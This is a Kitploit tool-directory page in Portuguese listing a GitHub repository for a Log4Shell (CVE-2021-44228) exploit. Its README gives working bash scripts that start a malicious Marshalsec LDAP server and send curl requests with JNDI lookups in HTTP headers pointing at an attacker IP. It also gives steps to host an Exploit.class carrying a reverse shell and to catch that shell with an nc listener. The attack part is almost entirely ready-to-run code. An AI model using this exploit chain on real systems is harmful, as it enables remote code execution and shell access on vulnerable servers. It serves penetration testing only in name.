Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228-Log4Shell- — Teste de penetração | Kitploit
Ferramentas/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso Remoto
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

Teste de penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
2há 1 anoAinda não revisado
Compartilhar

CVE-2021-44228-Log4Shell-

Teste de penetração

  1. Criar servidor LDAP malicioso (usando Marshalsec) #!/bin/bash

Script: start_ldap_server.sh

Yêu cầu: Cài đặt Java và Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389" HTTP_PORT="8000" ATTACKER_IP="192.168.0.101" REVERSE_PORT="5555"

echo "[+] Khởi động LDAP server độc hại trên port $LDAP_PORT..." java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT

  1. Enviar payload Log4Shell a partir do servidor web comprometido

#!/bin/bash

Script: exploit_log4shell.sh

Mục tiêu: Gửi payload JNDI đến máy trạm Windows

TARGET_IP="192.168.1.10" ATTACKER_IP="192.168.0.101" LDAP_PORT="1389"

echo "[+] Gửi payload Log4Shell đến $TARGET_IP..." curl -X GET
"http://$TARGET_IP"
-H "User-Agent: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"
-H "X-Api-Version: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

Como usar

Iniciar servidor LDAP:

./start_ldap_server.sh

Executar servidor HTTP para hospedar o arquivo Exploit.class (contendo reverse shell):

python3 -m http.server 8000

Enviar payload a partir do servidor web comprometido

./exploit_log4shell.sh

Ouvir reverse shell na máquina atacante:

nc -lvnp 5555

Baixar ferramenta